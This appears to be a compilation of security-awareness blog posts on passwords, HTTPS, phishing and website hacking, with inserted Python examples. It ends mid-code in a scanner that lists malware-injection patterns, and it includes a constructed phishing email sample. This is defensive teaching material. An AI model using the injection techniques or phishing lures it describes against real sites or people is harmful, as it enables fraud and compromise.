Ten ways to protect yourself online

Any time you are online you are vulnerable to hackers. Whether you are a sole proprietor or a massive corporation like Sony, your chances of being hacked, scammed, or infiltrated in some way, are unfortunately about the same. Hackers can steal your credit card numbers, tax records and passwords, erase your hard drive, disable your entire computer, and even use your built-in webcam or microphone to spy on you. The most complete way to protect yourself online would be to get offline and disconnect yourself immediately, but that solution is no longer an option for any of us.

To protect yourself online, you should take these 10 steps very seriously:

1. Fortify your passwords

Don’t reuse your passwords. If an attacker gets your password she might try it on all of your accounts. This means that a given password is really only as secure as the least secure service where it’s used. Use a single master password or passphrase along with a password manager like LastPass. Choose strong passwords – short passwords of any kind, even totally random ones like nQ\m=8*x or !s7e&nUY are not strong enough today.

2. Use a password manager

Check out LastPass. This is what I use. There’s a free version that syncs between devices but doesn’t allow you to sync with your mobile phone. The premium version costs just $12/year!

3. Secure your security questions

Beware of security questions. Honest answers to many security questions are often publicly discoverable facts. If you do use factual information in the security questions, make them more secure by adding numbers and other characters. Your cat Fluffy can be F1uff7 instead.

4. All HTTPS all the time

HTTPS will encrypt any stream of data between you and the service, ensuring that anyone using Firesheep or a packet sniffer on a (usually public) Wi-Fi network can’t glean your login data. Never work at a coffee shop or on any other public Wi-Fi network without it.

5. Turn on Two-Step Verification

Facebook and Google both offer the option of 2-Step authentication when you log in, meaning you have to enter a secondary PIN which is generated by an app and/or texted to your phone. It’s a complete and utter pain in the ass whenever you’re logged out, but it’s also a pretty safe guarantee that no one will be getting into your account without a heavy-duty targeted attack.

6. Use a secret email address

Publicly available information is the first way a hacker can get their foot in the door. Few things are tossed around more casually than an email address. Don’t give potential hackers a starting point, especially if you use the same login info across multiple sites (which you shouldn’t be doing in the first place!). Instead, create an email address that as few people know about as possible that you use only for account log-ins.

7. Set up login notifications

Facebook will allow you to receive a text message anytime an unrecognized IP address logs in to your account. You may not prevent a hack, but if you act quickly enough, you can remotely log them out and re-secure your account before they get their hands too deep into your business. Gmail is also set by default to alert you if it notices anything particularly strange with your login activity.

8. Put passwords on your devices

This is a no-brainer and should not require explanation. All of your phones, tablets, laptops, and desktops should have a password.

9. Don’t save your credit card information in your browser

Another no-brainer.

10. Keep an offline backup

Just in case your online backup provider is ever hacked, it’s probably a good idea to have your most important documents backed up using a physical hard drive connected to your computer.

11. Don’t link your accounts

Facebook sign-on certainly makes life easy for you, but imagine what happens when someone steals the phone that doesn’t have a password or hacks your password on your computer.

12. Use email wisely

Email is a great way to keep in touch with friends and family, and as a tool to conduct business. Even if you have good security software on your PC, however, your friends and family might not have the same protection. Be careful about what information you submit via email. Never send your credit-card information, Social Security number, or other private information via email.

Conclusion

Those of you who are very perceptive will note that I couldn’t resist and actually gave you 2 extra tips for protecting yourself online. Data shows that a blog post titled “ten ways to protect yourself online” will do better than the same post titled “twelve ways to protect yourself online”. If I had to home in on one or two particularly important ways to protect yourself online, I would pick number 1/2 – fortify your passwords/use a password manager and number 12 – use email wisely as the most important ways to protect yourself online.

Do you all agree with me? Did I miss anything?

If You Aren’t Using a Password Manager, It’s Time To Start Using One Now

Online merchants and secure websites aren’t doing a very good job of keeping your personal information safe. Not a week goes by without news about a major online retailer being hacked. To make matters worse, even those websites that use decent security practices may have been compromised by the recently discovered Heartbleed bug. If the bad guys got your password, you’re in trouble. But if you used that same password at other sites, then you’re really in trouble. The only safe thing to do is to use a different strong password on every site, and the only practical way to do that is with a password manager.

If you aren’t using a password manager, it’s time to start using one now. This is important stuff, and it is easy to keep putting off, because setting up a password manager involves a considerable amount of time and planning. If you are starting from scratch, chances are good that you are using your browser’s built-in password management feature. There are a variety of password managers, but we recommend LastPass and will help walk you through the process. LastPass will import those passwords, delete them from the browser, and turn off the browser’s password management. LastPass goes for a clean sweep, importing from all major browsers.

Beyond The Master Password

Most password managers support authentication using a master password. Since it’s protecting all of your other passwords, that one password needs to be really strong. But if that’s the only protection for your data, a crook who manages to steal your master password can access all of your data. The best password managers offer two-factor authentication.

LastPass 3.0 Premium can be configured for fingerprint-based authentication. LastPass supports authentication via the Google Authenticator mobile app.

Password Capture and Replay

Most, but not all, password managers integrate with the browser to capture login credentials as you enter them and replay those credentials when you revisit the site. LastPass goes a step beyond, actively detecting and managing password change events and capturing credentials as you sign up for a new service.

Quite a few password managers let you log in to your password storehouse from any browser, so you can look up credentials even when using someone else’s computer. Among these are Norton Identity Safe, RoboForm Everywhere 7, and Keeper 5.0; LastPass and Dashlane also offer this feature. F-Secure, by contrast, doesn’t allow any online access, considering it a potential security risk.

Form Filling and Personal Data

Given that most password managers already have the ability to fill your username and password into a login form, it’s not surprising that many also serve as form fillers for personal data. LastPass will cleverly offer to capture what you’ve entered if it sees that you are filling a form manually.

LastPass can store various types of ID data such as passports and driver’s licenses.

Free Protection

The free edition of LastPass has almost everything found in the premium; support for mobile devices is the big exception. LastPass Premium costs only a dollar a month. That’s not a lot, considering what LastPass is protecting.

Security Checkup

Virtually every password manager will report the strength of your master password. And virtually every product will generate strong, random passwords for you on demand.

LastPass takes this concept a step further by offering a security report listing all of your passwords and rating the strength of each. They also report on duplicates—passwords you’ve used on more than one site. And they make it easy to upgrade all your passwords to improve security.
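An added example, not code from LastPass or the original posts, that works through the two checks described here and under tip 1 above (rating each password's strength and reporting duplicates): it estimates a guessing-entropy upper bound for every entry of a constructed sample vault, bands it, and lists where each password is reused. The vault entries, the rating bands and the word-plus-digits heuristic are assumptions made for the demo.

```python
import math
import re
from collections import defaultdict

# Constructed sample vault for the demo: (site, password). None of these are real credentials.
SAMPLE_VAULT = [
    ("bank.example", "nQ\\m=8*x"),       # the short random password quoted in tip 1
    ("mail.example", "nQ\\m=8*x"),       # reused: the same password on a second site
    ("shop.example", "fluffy2012"),      # pet name plus a year
    ("forum.example", "correct horse battery staple tomato"),
    ("work.example", "Tr0ub4dor&3"),
]

# Simplistic heuristic (an assumption of this example, not a real cracker model):
# letters followed by up to four digits is a classic dictionary-attack shape.
WORD_PLUS_DIGITS = re.compile(r"[A-Za-z]{3,}\d{0,4}")


def charset_size(pw):
    """Size of the character pool implied by the classes present in the password."""
    size = 0
    if any(c.islower() for c in pw):
        size += 26
    if any(c.isupper() for c in pw):
        size += 26
    if any(c.isdigit() for c in pw):
        size += 10
    if any(not c.isalnum() for c in pw):
        size += 33  # printable ASCII punctuation plus space
    return size


def entropy_bits(pw):
    """Upper-bound guessing entropy: assumes every character was chosen uniformly
    from the pool, then caps obvious dictionary shapes so they rate as weak."""
    if not pw:
        return 0.0
    bits = len(pw) * math.log2(charset_size(pw))
    if WORD_PLUS_DIGITS.fullmatch(pw):
        bits = min(bits, 30.0)
    return bits


def rating(bits):
    """Coarse bands; an 8-character fully random password lands in 'fair', matching
    the article's point that such passwords are no longer strong enough."""
    if bits < 40:
        return "weak"
    if bits < 60:
        return "fair"
    if bits < 80:
        return "good"
    return "strong"


def audit(vault):
    """Rate every entry and list the other sites where the same password is reused."""
    sites_by_password = defaultdict(list)
    for site, pw in vault:
        sites_by_password[pw].append(site)
    report = []
    for site, pw in vault:
        bits = entropy_bits(pw)
        report.append({
            "site": site,
            "bits": round(bits, 1),
            "rating": rating(bits),
            "reused_on": [s for s in sites_by_password[pw] if s != site],
        })
    return report


def entry(report, site):
    """Look up one site's line in an audit report."""
    return next(r for r in report if r["site"] == site)


if __name__ == "__main__":
    for r in audit(SAMPLE_VAULT):
        reuse = f" (also used on {', '.join(r['reused_on'])})" if r["reused_on"] else ""
        print(f"{r['site']:<15} {r['bits']:>6} bits  {r['rating']:<6}{reuse}")
```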
10 Reasons Your Site Should Be HTTPS

If you have a website that is still HTTP, you should seriously consider upgrading to HTTPS. While it’s true that historically HTTPS websites were limited to e-commerce websites, HTTPS is now the standard. This post will explain what HTTPS is and give you 10 reasons to make sure that you upgrade to HTTPS as soon as possible.

What is HTTPS?

HTTPS is a way to encrypt information that is sent between a browser and a web server. This protects users of your website from man-in-the-middle attacks, where someone intercepts information that is being sent to a website, like credit card information or logins.

What is an SSL Certificate?

An SSL Certificate is a set of data files that you add to your server to secure an encrypted connection between a browser and your server. When installed, a green padlock will display when users visit your site to indicate that the site is secure.

Are SSL and HTTPS the same thing?

These terms are two sides of the same process of creating an encrypted website. An SSL certificate is the product that is needed and HTTPS is the result of having that certificate on your server. You cannot have one without the other.

If your website isn’t secure yet, it definitely should be. 

Reasons why you should upgrade to HTTPS immediately:

  1. Improved Google Rankings
  2. HTTPS alerts by Google Search Console
  3. Browsers Increasing Alerts for Non-secure Sites
  4. Better Security
  5. Visible Security Signals for Visitors
  6. Increased Conversions
  7. Increase in Average Transaction Value
  8. Boost in Customer Confidence
  9. Required for any type of e-commerce transaction
  10. There Is No Reason Not To Have One

Improved Google Rankings

Google wants to ensure that its customers have the best online user experience. Understandably, Google doesn’t want to send its users to insecure websites. Because of that, Google’s ranking algorithm now favors HTTPS sites. If your website isn’t secure, it could be getting outranked by your competitors that are secure.

HTTPS alerts by Google Search Console

Google has been sending notices to webmasters via the Google Search Console if a login page or any page collecting any password is not secured over HTTPS. Anything in Google Search Console should be considered important in the eyes of Google and their algorithms.

Browsers Increasing Alerts for Non-secure Sites

Since January 2017, Google provides security warnings in Google Chrome for users if there is no valid SSL certificate on a web page. Google marks these sites as non-secure. Other browsers are following Google Chrome’s lead on this.

Better Security

This is an obvious benefit for everyone. HTTPS protects user information from potential hackers. Better security is a better experience for all.

Visible Security Signals for Visitors

Security is one of the biggest concerns visitors have, preventing many of them from shopping or providing their information online. One of the key benefits of having an SSL certificate is the sign that you can display on your website indicating it is secure.

Increased Conversions

This is another relatively straightforward benefit of having a secure website. The more secure your site is, the more people will feel comfortable interacting with the site. Those interactions may be filling out contact forms, registering for events, signing up to be notified about something in the future, becoming a member, or buying something online.

Increase in Average Transaction Value

There is often also an increase in the average transaction value on an e-commerce site once a site is more secure. With online purchases, part of the concern that users have with security has to do with the impact on the amount being paid. The higher the transaction amount, the greater the fear of being scammed.

Boost in Customer Confidence

A secure connection gives website visitors peace of mind that your website can be trusted and their information is safe. This is particularly important in fields where trust is paramount – lawyers, doctors, financial services, insurance, real estate.

Required for Any Type of E-Commerce Transaction

If you sell anything online, you have to have HTTPS. Most credit card processors won’t even let you sell anything online without it. But if you own a website and you sell anything online, and you don’t have HTTPS, make sure you upgrade immediately.

There Is No Reason Not To Have One

The only issues experienced with SSL certificates occur when they expire or when the implementation is incorrect. To that end, keep your subscriptions active and set the primary domain for your website to force the https version. That is, pick either www or non-www as your preference; every other version (http, and the www form you didn’t pick) should 301-redirect to the https version, and any canonical tags should point to that https version as well.
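The redirect policy just described, as an added example (not code from Connect4 Consulting or the original post): for any way a request can arrive, it computes the single 301 target, returns None once the request is already on the https canonical origin, and emits the matching canonical tag. The host example.com and the choice of the non-www form as canonical are assumptions for the demo.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumption for this example: the non-www form was picked as the canonical host.
CANONICAL_HOST = "example.com"


def _strip_www(host):
    return host[4:] if host.startswith("www.") else host


def canonical_redirect(url, canonical_host=CANONICAL_HOST):
    """Return the single 301 target for a request URL, or None when the request
    is already on the canonical https origin or is for a host we do not serve.
    Folds http->https and www<->non-www into one hop and keeps path and query."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    canonical_host = canonical_host.lower()
    if _strip_www(host) != _strip_www(canonical_host):
        return None  # some other hostname: not ours to redirect
    on_canonical = (
        parts.scheme == "https"
        and host == canonical_host
        and parts.port in (None, 443)
    )
    if on_canonical:
        return None
    # Drop any non-default port and the fragment (browsers re-apply the fragment themselves).
    return urlunsplit(("https", canonical_host, parts.path or "/", parts.query, ""))


def canonical_link_tag(url, canonical_host=CANONICAL_HOST):
    """The <link rel="canonical"> a page should carry, pointing at the https
    version regardless of which variant the visitor used to reach it."""
    target = canonical_redirect(url, canonical_host) or url
    return f'<link rel="canonical" href="{target}">'


def is_single_hop(url, canonical_host=CANONICAL_HOST):
    """Check that following the policy once lands on a URL that needs no further
    redirect, i.e. there is no http -> https -> non-www chain."""
    first = canonical_redirect(url, canonical_host)
    return first is None or canonical_redirect(first, canonical_host) is None


if __name__ == "__main__":
    for request in ("http://www.example.com/shop?id=1", "https://www.example.com/",
                    "http://example.com", "https://example.com/shop?id=1"):
        print(f"{request:<35} -> {canonical_redirect(request)}")
```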

How Do You Switch Your Site To HTTPS?

If you’re reading this article and your website is hosted by Connect4 Consulting, contact us and we can easily fix this for you.
A PIN is Better Than A Fingerprint For Protecting Private Data on Your Phone

A PIN is better than a fingerprint for protecting private data on your phone. Most modern smartphones now have fingerprint scanners. They are great for adding an extra level of security to your phone and make it really convenient to log into accounts and pay for purchases. But it turns out that in the United States, they don’t help you maintain your privacy in front of law enforcement.

In October 2014, a Virginia court ruled that suspects can be asked to unlock their phones using their fingerprints. Apparently this wasn’t tested until this February, when a judge in Los Angeles issued a warrant requiring a woman accused of identity theft to unlock her iPhone with her fingerprint.

The key in this case is that had the woman used a PIN instead of her fingerprint to lock her phone, she wouldn’t have had to unlock it for the police. This is because the Fifth Amendment, which protects people from incriminating themselves during legal proceedings, prevents government agencies from forcing people to turn over memorized codes. However, a fingerprint, or any other biometric identifier, can be collected.

There are several ways to fool fingerprint scanners, including the use of tape, so if someone could obtain a copy of your fingerprint, they could use it to access your phone.
Cyber Security – Will Our Risk Decrease If We Have Fewer Devices?

This is a good question but I don’t think it’s immediately a cyber security question. There is definitely a correlation between the number of devices you have to manage and potential risk. And it’s possible there’s a cost savings by having a laptop instead of multiple devices as there are fewer computers that need to be serviced. But I think your actual cyber security risk goes up when you give people mobile devices. Laptops can be used in many unsafe places and their versatility might actually increase security problems.

The real answer is the educational one. If people make the right choices, then cyber security risks can be minimized.

Here are some pointers to help you create an action plan to strengthen your company’s defenses against hackers:

1) Failure to cover cyber security basics – software and operating system updates

2) Not understanding what generates corporate cyber security risks

3) Lack of a cyber security policy

As part of their cyber security policies, companies should:

  • identify risks related to cyber security
  • establish cyber security governance
  • develop policies, procedures and oversight processes
  • protect company networks and information
  • identify and address risks associated with remote access to client information and funds transfer requests
  • define and handle risks associated with vendors and other third parties
  • be able to detect unauthorized activity.

4) Confusing compliance with cyber security

5) The human factor – the weakest link

6) Bring Your Own Device (BYOD) Policy and the Cloud

7) Funding, talent and resource constraints

Think of this security layer as the immune system of your company that needs funding and talent to ensure that you don’t experience severe losses as a consequence of cyber-attacks. A good approach would be to set reasonable expectations towards this objective and allocate the resources you can afford.

8) No information security training

Employee training and awareness is essential when covering your base in terms of information security.

Another quick look at the most common file types that hackers use to penetrate your system and trigger attacks that can lead to data leakage tells you what types of actionable advice you could include in your employees’ trainings on cyber security.

9) Lack of a recovery plan

Being prepared for a security attack means having a thorough plan both for preventing a cyber-attack and for minimizing the damage if it takes place.

10) Constantly evolving risks

Polymorphic malware is harmful, destructive or intrusive computer software such as a virus, worm, Trojan or spyware that constantly changes, making it difficult to detect with anti-malware programs. That is why you should take into account that your company might need an extra layer of protection, on top of the antivirus solution.

The first line of defense must be ensured by a product that can act proactively to identify malware, block access to hacker controlled servers and stop data leakage, but also keep your system protected by patching vulnerabilities (usually, applications that are not up to date, such as Flash or Java).
Ten Tips For Spotting Phishing Emails

Every day millions of phishing emails are sent to unsuspecting victims all over the world. I know because I receive five or six myself in my spam folder every day. While some of these messages are so outlandish it’s obvious they are fraud, others can be a bit more convincing. So how do you tell the difference between legitimate emails and phishing emails? Unfortunately there is no single way, but this post provides ten tips for spotting phishing emails.

#1 URLs contain a misleading domain name

People who launch phishing scams often rely on victims who don’t know much about technology or how the DNS naming structure for domains works. The last part of a domain name is the most telling. For example, the domain name info.gabeseiden.com would be a child domain of gabeseiden.com because gabeseiden.com appears at the end of the full domain name (on the right-hand side). Conversely, gabeseiden.com.maliciousdomain.com would clearly not have originated from gabeseiden.com because the reference to gabeseiden.com is on the left side of the domain name.

This happens all the time, especially when the phishing criminal uses a trusted name like Microsoft or Apple or even the IRS. The resulting domain name looks something like this: Microsoft.maliciousdomainname.com.

#2 The message is poorly written with grammar and spelling mistakes

Whenever a company sends out a message on behalf of the company as a whole, the message is usually reviewed for spelling, grammar, and legality. So if a message is filled with poor grammar or spelling mistakes, it probably didn’t come from a major corporation’s legal department.

#3 The message asks for personal information

This is usually a major red flag. No matter how official an email message looks, it’s always a bad sign if the email asks for personal information. Your bank or credit card company already knows your account number and Social Security number.

#4 The message contains a mismatched URL

One of the first things you should check in a suspicious email message is any embedded URL. Often the URL in a phishing message will appear to be perfectly valid, but if you hover your mouse over the link, you see the actual hyperlinked address (at least in Outlook). If the hyperlinked address is different from the address that is displayed, the message is probably fraudulent or malicious.
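An added example, not code from the original post, that mechanizes tips #1 and #4: it decides whether a trusted name is really the right-hand end of a host, and it extracts the links from a constructed HTML message to compare each displayed address with the real href. The sample message and the .example hosts are constructed, and the registrable-domain logic is a simplification that assumes a one-label suffix such as .com.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message body (not a real phishing email); hosts use the
# reserved .example TLD so nothing here resolves.
SAMPLE_EMAIL_HTML = """
<p>Your account needs attention. Please visit
<a href="http://paypal.com.malicious.example/login">www.paypal.com/login</a> to verify it.</p>
<p>Newsletter archive: <a href="https://info.gabeseiden.com/news">gabeseiden.com/news</a></p>
<p><a href="https://malicious.example/track">Click here</a> to unsubscribe.</p>
"""

URL_LIKE = re.compile(r"(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def registrable_domain(host, suffix_labels=1):
    """Rightmost labels that name the domain owner, e.g. 'paypal.com' for
    'www.paypal.com'. Simplification: assumes a one-label public suffix such as
    .com; a production check should consult the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-(suffix_labels + 1):])


def is_under(host, trusted):
    """True when host is the trusted domain or a child of it (the tip #1 rule:
    what matters is the right-hand end of the name)."""
    host, trusted = host.lower().rstrip("."), trusted.lower().rstrip(".")
    return host == trusted or host.endswith("." + trusted)


def misleading_domain(url, trusted):
    """Tip #1: the trusted brand appears somewhere in the host, but the host is
    not actually under the trusted domain (e.g. gabeseiden.com.malicious.example)."""
    host = (urlparse(url).hostname or "").lower()
    brand = trusted.lower().split(".")[0]
    brand_present = any(brand in label for label in host.split("."))
    return brand_present and not is_under(host, trusted)


class LinkExtractor(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def mismatched_links(html):
    """Tip #4: links whose visible text looks like a URL on one domain while the
    real href points at another. Anchors with plain text ('Click here') cannot
    be judged this way and are skipped; hovering is the only check for those."""
    parser = LinkExtractor()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        m = URL_LIKE.search(text)
        if not m:
            continue
        shown = registrable_domain(m.group(1))
        actual = registrable_domain(urlparse(href).hostname or "")
        if shown != actual:
            findings.append((text, href))
    return findings


if __name__ == "__main__":
    print(misleading_domain("http://gabeseiden.com.malicious.example/login", "gabeseiden.com"))
    for text, href in mismatched_links(SAMPLE_EMAIL_HTML):
        print(f"shown: {text!r:<28} actually goes to: {href}")
```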

#5 The message looks too good to be true

If you receive a message from someone unknown to you who is making big promises, the message is probably a scam.

#6 You’re asked to send money to cover expenses

You might not get hit up for cash in the initial message. But sooner or later, phishing criminals will ask for money to cover expenses, taxes, fees, or something similar. If that happens, you can bet that it’s a scam.

#7 You didn’t initiate the action

If you get an email congratulating you on winning the lottery, but you never bought a ticket, you can bet that it’s a scam. If you didn’t do something to initiate the action, it is probably a scam.

#8 The message makes unrealistic threats

Most phishing scams try to trick people into giving up cash or sensitive information by promising instant money. However, some phishing scams use intimidation to scare victims into giving up information. If a message makes unrealistic threats, it’s probably a scam. Let me give you an example.

I once received an email from what looked like the IRS. Everything looked legitimate except for one thing. The letter said my account had been compromised and that if I did not submit a form (which asked for my social security number) along with two picture IDs, my assets would be seized.

I knew this was a scam because the IRS doesn’t send out emails like this. The IRS sends out its threats via snail mail.

#9 The message appears to be from a government agency

Government agencies in the U.S. don’t normally use email as an initial point of contact.

#10 Something is fishy

If you receive a message that seems suspicious, it’s usually in your best interest to avoid acting on the message. On the off chance that it’s a real message, usually the real person will find another way to contact you.

How to stay ahead of cyber criminals

It’s no secret that cyber attacks are becoming increasingly sophisticated, stealthy, and, as a result, commonplace. We have seen high profile security breaches at Target, JP Morgan, Home Depot, and the US Government. Attackers can infiltrate practically any “secure” environment and maneuver undetected for months at a time while they scope out the best approach (for them) for a cyber attack. So the question for us is – how do we stay ahead of cyber criminals?

This is ultimately a cat and mouse game and it’s clear that the cyber criminals play the cat in this game. As cyber attackers become increasingly aware of cyber security measures, both large and small organizations must be on the defense and continuously learn about potential warning signs. Here are a few helpful tips to help you stay ahead of cyber attacks and reduce the risk of data breaches.

Constant Change

There’s one thing that cyber criminals and the rest of us have in common – none of us like change. We want to keep systems and processes static because it makes life and work easier. Attackers love static systems and processes because it makes it easier for them to study their subjects, learn the ins and outs, and figure out exactly how they can compromise your data. If you want to make it difficult for sophisticated cyber attackers, create a culture that thrives on change.

Monitor for Usage of Irrelevant Information

Cyber criminals do their homework before launching an attack. Sometimes their data is misinformed or incomplete. You should monitor for activity that doesn’t make sense for your organization.

A typical example of an irrelevant information scenario is the “former employee” situation. In this case, an attacker targets a specific user from your list of employees, not knowing that the person no longer works for your organization. Because the employee no longer works for you, that employee should not be taking actions within the company’s network and the network shouldn’t be contacting them. Spotting this suspicious activity can help you prevent data breaches.
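A concrete version of this check, as an added example that is not part of the original post: it parses a constructed authentication log and flags any activity on an account on or after its owner's departure date, then groups the hits by source address. The log format, account names and addresses are assumptions made for the demo.

```python
import re
from datetime import date

# Constructed sample: offboarded accounts and the date each person left.
FORMER_EMPLOYEES = {
    "jsmith": date(2016, 3, 1),
    "mlee": date(2015, 11, 15),
}

# Constructed sample authentication log (not from any real system).
SAMPLE_LOG = """\
2016-04-02 09:14:03 LOGIN_OK user=adavis src=10.0.1.22
2016-04-02 09:15:41 LOGIN_FAIL user=jsmith src=203.0.113.7
2016-04-02 09:15:52 LOGIN_FAIL user=jsmith src=203.0.113.7
2016-04-02 11:02:10 PASSWORD_RESET_REQUEST user=mlee src=198.51.100.9
2016-04-02 13:40:00 LOGIN_OK user=rkhan src=10.0.1.31
2016-02-20 08:00:00 LOGIN_OK user=jsmith src=10.0.1.40
"""

LINE_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<event>\S+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_log(text):
    """Turn the sample log into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["date"] = date.fromisoformat(e["date"])
            events.append(e)
    return events


def former_employee_activity(events, former=FORMER_EMPLOYEES):
    """Flag any event on an account on or after its owner's departure date.
    A failed login counts too: the former employee has no reason to try, so the
    attempt itself is the 'irrelevant information' signal the article describes.
    Activity dated before the departure (the last sample line) is normal history."""
    alerts = []
    for e in events:
        left = former.get(e["user"])
        if left is not None and e["date"] >= left:
            alerts.append({
                "user": e["user"],
                "event": e["event"],
                "src": e["src"],
                "when": f"{e['date'].isoformat()} {e['time']}",
                "days_after_departure": (e["date"] - left).days,
            })
    return alerts


def by_source(alerts):
    """Group flagged users by source address so one origin probing several old accounts stands out."""
    grouped = {}
    for a in alerts:
        grouped.setdefault(a["src"], []).append(a["user"])
    return grouped


if __name__ == "__main__":
    hits = former_employee_activity(parse_log(SAMPLE_LOG))
    for a in hits:
        print(f"{a['when']} {a['event']:<22} {a['user']:<8} from {a['src']} "
              f"({a['days_after_departure']} days after departure)")
    print(by_source(hits))
```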

Avoid Alarm Fatigue

Security appliances are more sensitive than ever to better detect potential threats, but the sharp increase in alerts leaves security teams running ragged.

It is impossible to launch a full-scale investigation every time your security appliances send a notification. Instead, you must monitor your organization for signs of alarm fatigue and resolve them as soon as possible. If you stop monitoring for serious notifications, you are sure to miss the real issues as they come up.

Invest in Cyber Security Education

Did you know that human error is the leading cause of data loss? Cyber security training and education teaches employees the importance of changing passwords and monitoring for suspicious activity to cut down on the amount of human errors.

One major part of training employees for better cyber security is preparing them for phishing schemes. In phishing attacks, cyber criminals often send out seemingly legitimate emails, mimicking companies like PayPal or eBay in an attempt to lure readers to click on a fake link. While the link seems real and the landing page is set up with real logos, the site is built to funnel sensitive data to cyber criminals. The email might mention an issue with the user’s account and lead them to a site that requests PINs, credit card data and more. These can be tough to spot, but there are warnings to look out for.

All of the security solutions in the world can’t protect your network if your workforce is willingly (but unknowingly) giving cyber criminals access to it. Creating a truly secure workforce requires ongoing education and training.
Apple vs. The FBI – What’s At Stake?

Apple and the FBI spent more than five hours on Monday testifying before Congress over the ongoing San Bernardino terrorist iPhone saga. While there weren’t any conclusions, it was a chance for both sides to lay out their case.

To recap, the FBI wants Apple to help it unlock an encrypted iPhone tied to the San Bernardino case by building a customized version of iOS. Apple, on the other hand, argues that doing so would compromise security of every iPhone moving forward.

The problem is that allowing the government to unlock a single device has huge implications for the future of privacy. This case is not about the San Bernardino terrorists. I don’t even think the FBI thinks it will gain any new information pertinent to their case. This is all about establishing precedent for future cases.

The Department of Justice is not asking Apple to turn off the phone’s security or bypass the PIN. It wants Apple to make it easier for the FBI to get into the device by guessing the passcode, without destroying the encrypted data on the phone. Specifically, the order signed by US magistrate judge Sheri Pym says Apple “shall assist in enabling the search” of the suspect’s iPhone by creating a special firmware that would only work on that particular device.

The firmware that the judge wants Apple to create would disable the security feature that erases the phone’s contents after 10 unsuccessful login attempts. It would also disable the time limits that grow longer after each failed attempt and allow authorities to connect the phone to a computer to “brute force” the passcode so that officials don’t have to tap it into the phone by hand.

Apple isn’t arguing about technical feasibility; it’s concerned with legal precedent. “The implications of the government’s demands are chilling,” Tim Cook says in his letter. “If the government can use the All Writs Act to make it easier to unlock your iPhone, it would have the power to reach into anyone’s device to capture their data.” The company is afraid that once a backdoor is created, other agencies and governments will come demanding access in the name of global security.

Given what we now know about the government’s technological abilities, I find it hard to believe that the NSA or CIA doesn’t already have the capability to unlock the phone.

A hearing on Apple’s appeal is scheduled for March 22nd. It’s almost certain that the decision will be appealed by the losing side. The case could then go to a district court judge, and if challenged there, to the U.S. Court of Appeals for the Ninth Circuit. Ultimately, as many legal experts have predicted, the case could end up in the Supreme Court.

Why Websites Get Hacked

I spend a fair amount of time working on new websites as well as fixing websites that have been hacked and this question always comes up:

Why would anyone ever hack my website? I’m just a small business owner.

Depending on who you are, websites get hacked for different reasons, but there are a few specific explanations.

Automation is key

Website attacks that target small businesses and smaller websites are fully automated. Automated attacks give hackers the following benefits:

  • Mass exposure
  • Reduction in overhead
  • Tools for everyone regardless of skill
  • Dramatically increases the odds of success (for the hacker)

The majority of these attacks are automated and follow a specific sequence:

  1. Reconnaissance
  2. Identification
  3. Exploitation
  4. Sustainment

While thinking about how these attacks occur, it’s important to address the two types of attacks: attacks of opportunity and targeted attacks.

Attack of Opportunity

Almost all small business website attacks are attacks of opportunity. This means that it’s not one individual or group that is trying to hack into your specific website, but rather a coincidence. Something about your site was caught in the dragnet as they crawl the internet looking for hacking opportunities. It could have been something simple like having a known plugin installed, or maybe displaying the version of a platform (displaying the fact that you’re using an outdated version of WordPress, for example).

According to Sucuri, a website security company, it takes about 40 days for a new website with no content or audience to be identified and added to a bot crawler. Once added, the attacks can begin immediately without any real rhyme or reason. It can be any website; the only commonality is that they are all connected to the internet.

These web crawlers then begin to look for identifying markers. Is the website running WordPress, Joomla, Drupal? If so, is the website running any software with known vulnerabilities or bugs in the code? If the answer is yes, the site will be marked for the next phase of attack, exploitation.

The sequence of events can happen in a matter of minutes, days, or months. It’s not a singular event; it’s ongoing and occurs continuously as the bot crawlers are scanning for vulnerabilities. Once your website is on the list, it will just keep on trying until it succeeds. This is why it is so critical to have someone actively managing your website and – at a bare minimum – updating software.

Targeted Attack

Targeted attacks are often reserved for big businesses, but not always. Think of the NBC hack in 2013 or the Forbes hack in 2014. There are many examples of these attacks lately but it’s obvious why there’s an uptick in this trend. Even though it requires much greater hacking skill, the payoff to the hacker can be huge. A very common type of targeted attack is called a Denial of Service attack in which the attacker works to bring down the availability of your site by overloading it with traffic.

Hacking Motivations & Drivers

Now that you have a better understanding of how these attacks happen, let me unpack some reasons why websites get hacked.

Economic Gains

The most obvious reason websites get hacked is economic gain: the attacker uses your audience to make money, either by getting visitors to click on something or to download something.

Drive-by Downloads

A drive-by download is the act of injecting malware into your website in the hope of infecting as many visitors as possible. Imagine someone visiting your website and then calling you because they installed a fake piece of software that your site supposedly recommended, and then found their bank account drained. Scary, very real, and devastating.

Black Hat SEO

The other strategy is the black hat SEO campaign. These are less devastating to your visitors but can be more lucrative for the attacker. This is the game of abusing your audience by redirecting them to pages that generate affiliate revenue for the attacker.
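Both of the injections above (drive-by malware and black hat SEO redirects) usually end up as code planted in your site's own theme, plugin or template files, so one useful check is to scan those files for the shapes such code takes. The following Python scanner is an added example, not code from the original page: the three sample files are constructed, and the rules (hidden iframes, eval() of decoded payloads, long base64 blobs, redirects conditioned on a search-engine referrer or crawler user-agent) are assumed heuristics, not a complete malware signature set.

```python
"""Scan site files for code typical of drive-by download and black hat SEO injections.

Added example, not code from the original page. The sample files are constructed
and the rules are assumed heuristics for common injection shapes, not a complete
malware signature set; review every hit by hand before deleting anything.
"""
import re
from typing import Dict, List, Tuple

# (category, description, regex) - each regex is applied case-insensitively to a file's text
RULES: List[Tuple[str, str, str]] = [
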